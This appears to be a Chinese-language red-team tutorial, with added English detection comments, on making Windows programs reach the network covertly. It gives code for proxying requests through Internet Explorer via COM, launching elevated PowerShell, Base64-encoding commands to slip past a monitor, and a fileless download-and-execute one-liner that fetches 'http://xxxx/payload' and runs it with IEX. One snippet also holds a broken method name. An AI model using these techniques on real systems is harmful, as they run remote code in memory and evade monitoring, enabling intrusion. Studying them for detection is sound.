0x1. 主机程序通过调用 COM 组件的代码启动 IE,由 IE 去访问网络
特点: 发出网络请求的进程是 iexplore.exe,而不是主机程序自身
#include<stdio.h>
#include<windows.h>
#include<exdisp.h>
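int main()
{
    // Starts Internet Explorer as a separate process through COM and navigates it
    // to a fixed URL. Exit status: 0 when the navigation request was issued,
    // 1 when COM could not be initialised or IE could not be created.
    //
    // Detection note: the HTTP request itself is sent by iexplore.exe, so
    // telemetry keyed only on the requesting process will not point at this
    // program; the out-of-process activation of CLSID_InternetExplorer
    // (CLSCTX_LOCAL_SERVER below) is what ties the two processes together.

    // COM must be initialised on this thread before any COM library call
    // other than CoGetMalloc and the memory-allocation functions.
    if (FAILED(OleInitialize(nullptr)))
    {
        return 1;
    }

    IWebBrowser2* pBrowser2 = nullptr;  // the original left this uninitialised
    // CLSCTX_LOCAL_SERVER: IE is created in its own process; this one only drives it.
    HRESULT hr = CoCreateInstance(CLSID_InternetExplorer, nullptr, CLSCTX_LOCAL_SERVER,
                                  IID_IWebBrowser2, reinterpret_cast<void**>(&pBrowser2));
    if (FAILED(hr) || pBrowser2 == nullptr)
    {
        OleUninitialize();
        return 1;
    }

    VARIANT vEmpty;
    VariantInit(&vEmpty);
    BSTR bstrURL = SysAllocString(L"https://blog.csdn.net/superchickenchicken/article/details/102695335");
    if (bstrURL != nullptr)  // SysAllocString returns NULL on allocation failure
    {
        hr = pBrowser2->Navigate(bstrURL, &vEmpty, &vEmpty, &vEmpty, &vEmpty);
        if (SUCCEEDED(hr))
        {
            pBrowser2->put_Visible(VARIANT_TRUE);
            // Automation object of the active document, if there is one.
            // NOTE(review): Navigate is presumably asynchronous, so the document
            // may not be available yet at this point - confirm if it is needed.
            IDispatch* pHtmlDoc = nullptr;
            if (SUCCEEDED(pBrowser2->get_Document(&pHtmlDoc)) && pHtmlDoc != nullptr)
            {
                pHtmlDoc->Release();  // the original never released this reference
            }
        }
        else
        {
            pBrowser2->Quit();
        }
        SysFreeString(bstrURL);
    }

    pBrowser2->Release();
    OleUninitialize();
    return 0;
}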
触发访问请求,成功访问
当前进程的进程树
0x2 C语言调用powershell
#include<stdio.h>
#include<windows.h>
#include<exdisp.h>
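int main()
{
    // Launches an elevated ("runas") PowerShell whose command line drives
    // InternetExplorer.Application through COM. Returns 0 when the launch request
    // was accepted by the shell, 1 otherwise.
    //
    // Detection note: the whole script is passed on the command line, so it is
    // visible verbatim in process-creation telemetry (Sysmon event 1, or Windows
    // 4688 with command-line auditing enabled); the "runas" verb normally raises
    // a UAC prompt on the console session.
    //
    // ShellExecuteA is spelled out: the string literals below are narrow, and the
    // plain ShellExecute macro resolves to ShellExecuteW under a UNICODE build.
    const HINSTANCE result = ShellExecuteA(
        HWND_DESKTOP, "runas", "powershell.exe",
        "$ieObject= New-Object -ComObject \'InternetExplorer.Application\';$ieObject.Visible= $true;$ieObject.Navigate(\'https://blog.csdn.net/superchickenchicken\')",
        nullptr, SW_SHOWNORMAL);

    // Documented ShellExecute contract: a value greater than 32 means success.
    if (reinterpret_cast<INT_PTR>(result) <= 32)
    {
        return 1;
    }
    return 0;
}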
用 monitor 还是可以抓到,用下面脚本编码一下
# Base64-encodes the UTF-16LE bytes of a script for use with `powershell -EncodedCommand`.
# Detection note: this is encoding, not encryption. PowerShell decodes the value
# before running it, so script block logging (event 4104, where enabled) still
# records the plain script, and AMSI-integrated scanning still sees it where enabled.
$fileContent = “所要编码的脚本”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand
C 语言部分代码中的 powershell 执行命令改成
powershell -enc + $encodedCommand
0x3 powershell命令直接访问网络下载文件
# Fetches a URL body into memory with System.Net.WebClient; nothing is written to disk.
# Detection note: WebClient use from PowerShell surfaces in script block / module
# logging where enabled and in host network telemetry; `1.1.1.1/a` appears to be
# a placeholder destination.
$client = new-object System.Net.WebClient
$client.DownString('1.1.1.1/a')
0x4 无文件下载执行
# Fetches text over HTTP through a COM object activated by CLSID and passes the
# response to Invoke-Expression, so the fetched content never touches disk.
# Detection note: the COM activation, the outbound HTTP request and the IEX call
# are all still visible to script block logging and AMSI where enabled; confirm in
# the registry which COM class this CLSID maps to before writing a rule on it.
# `http://xxxx/payload` is a placeholder.
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));
$o.Open("GET", "http://xxxx/payload", $False); $o.Send();
IEX $o.responseText;
参考链接:https://www.freebuf.com/articles/system/207966.html